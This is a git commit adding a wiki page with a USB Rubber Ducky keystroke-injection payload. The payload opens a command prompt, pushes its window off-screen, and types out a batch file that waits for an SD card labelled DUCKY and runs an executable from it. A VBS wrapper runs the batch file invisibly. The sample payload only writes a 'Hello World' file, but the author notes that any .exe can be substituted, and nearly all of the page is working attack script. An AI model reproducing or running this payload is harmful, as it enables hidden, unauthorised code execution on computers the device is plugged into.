Created Payload runexe from sd (markdown)

This commit is contained in:
overwraith 2013-02-07 17:09:29 -08:00
parent 4f431f9156
commit 2e445ffd6c
1 changed files with 115 additions and 0 deletions

115
Payload---runexe-from-sd.md Normal file
View File

@ -0,0 +1,115 @@
The following is a payload I have been working on that waits until a drive labeled "DUCKY" is mounted. I have used some of midnightsnake's code in this payload. I have been having some problems with delays so I went a little overboard with the "DELAY 25" codes. The name of the file that is run can be changed to .exe, I am just having it run a batch for testing purposes. The line that says "STRING %myd%\myEXE.bat" is the line that executes the executable.
'''
REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
DELAY 4000
REM Using the run command for a broader OS base.
GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 25
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
DELAY 25
STRING erase /Q DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING copy con DuckyWait.bat
DELAY 25
ENTER
DELAY 25
REM DuckyWait.bat
DELAY 25
STRING :while1
DELAY 25
ENTER
DELAY 25
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
DELAY 25
ENTER
DELAY 25
STRING if Exist %myd% (
DELAY 25
ENTER
DELAY 25
STRING goto break
DELAY 25
ENTER
DELAY 25
STRING )
DELAY 25
ENTER
DELAY 25
STRING timeout /t 30
DELAY 25
ENTER
DELAY 25
STRING goto while1
DELAY 25
ENTER
DELAY 25
STRING :break
DELAY 25
ENTER
DELAY 25
REM Continue script.
DELAY 25
STRING %myd%\myEXE.bat
DELAY 25
ENTER
DELAY 25
CONTROL z
DELAY 25
ENTER
DELAY 25
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
DELAY 25
REM Delete vbs file if already exists
DELAY 25
STRING erase /Q invis.vbs
DELAY 25
ENTER
DELAY 25
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
DELAY 25
STRING copy con invis.vbs
DELAY 25
ENTER
DELAY 25
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
DELAY 25
ENTER
DELAY 25
CONTROL Z
DELAY 25
ENTER
DELAY 25
REM RUN THE BATCH FILE
DELAY 25
STRING wscript.exe invis.vbs DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING EXIT
ENTER
'''
The following is the batch file that is run after the "DUCKY" drive has been mounted. Everything is being run invisibly, so you will need to check for the existence of "Message.txt" which will probably be in "C:\Windows\system32".
'''
REM Message.txt
echo Hello Wolrd!!!
echo Hello World!!! > Message.txt
'''
This payload requires the REPEAT command, so until the online payload generator is online again, or the encoders start supporting the REPEAT command you will be stuck with copy and pasting the repeat command 100 times. I recommend pasting by groups of five or ten.